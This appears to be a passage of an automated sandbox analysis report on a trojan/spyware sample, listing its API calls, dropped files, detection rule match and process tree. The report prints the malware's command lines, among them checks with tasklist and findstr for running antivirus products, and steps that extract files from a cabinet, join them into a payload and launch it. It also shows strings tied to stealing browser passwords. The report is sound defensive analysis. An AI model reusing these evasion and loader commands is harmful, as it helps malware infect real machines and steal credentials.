Code function: 21_2_00111B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

21_2_00111B4D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		7_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		21_2_0011F20D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\UtilitySoccer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\MoveRefurbished	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\ClarkWriter	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_0040737E	7_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_00406EFE	7_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_004079A2	7_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_004049A8	7_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FEFE4	8_3_012FEFE4
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FEFE4	8_3_012FEFE4
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FEFE4	8_3_012FEFE4
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7E8	8_3_0130F7E8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130F7EB	8_3_0130F7EB
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D8017	21_2_000D8017
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000CE144	21_2_000CE144
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000BE1F0	21_2_000BE1F0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000EA26E	21_2_000EA26E
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000B22AD	21_2_000B22AD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D22A2	21_2_000D22A2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000CC624	21_2_000CC624
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000EE87F	21_2_000EE87F
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0013C8A4	21_2_0013C8A4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00122A05	21_2_00122A05
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000E6ADE	21_2_000E6ADE
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00118BFF	21_2_00118BFF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000CCD7A	21_2_000CCD7A
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000DCE10	21_2_000DCE10
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000E7159	21_2_000E7159
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000B9240	21_2_000B9240
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00145311	21_2_00145311
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000B96E0	21_2_000B96E0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D1704	21_2_000D1704
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D1A76	21_2_000D1A76
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000B9B60	21_2_000B9B60
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D7B8B	21_2_000D7B8B
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D1D20	21_2_000D1D20
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D7DBA	21_2_000D7DBA
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D1FE7	21_2_000D1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 000D0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 000CFD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: String function: 004062CF appears 57 times

Source: es5qBEFupj.exe, 00000000.00000002.1331797007.00000000052B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe
Source: es5qBEFupj.exe, 00000000.00000002.1322447264.0000000000AD2000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe
Source: es5qBEFupj.exe	Binary or memory string: OriginalFilenameladdad.exe4 vs es5qBEFupj.exe

Source: es5qBEFupj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.es5qBEFupj.exe.340000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: es5qBEFupj.exe

Static PE information: Section: ggsvuvii ZLIB complexity 0.9946427592132202

Source: es5qBEFupj.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/23@11/3

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_001241FA GetLastError,FormatMessageW,

21_2_001241FA

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00112010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		21_2_00112010
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00111A0B AdjustTokenPrivileges,CloseHandle,		21_2_00111A0B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

7_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0011DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

21_2_0011DD87

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_004024FB CoCreateInstance,

7_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_00123A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

21_2_00123A0E

Source: C:\Users\user\Desktop\es5qBEFupj.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\es5qBEFupj.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\es5qBEFupj.exe

File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\es5qBEFupj.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Climb.com, 00000015.00000003.1579641524.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579523228.0000000003A20000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: es5qBEFupj.exe	Virustotal: Detection: 33%
Source: es5qBEFupj.exe	ReversingLabs: Detection: 39%

Source: es5qBEFupj.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: es5qBEFupj.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\es5qBEFupj.exe "C:\Users\user\Desktop\es5qBEFupj.exe"
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: iphlpapi.dll	Jump to behavior
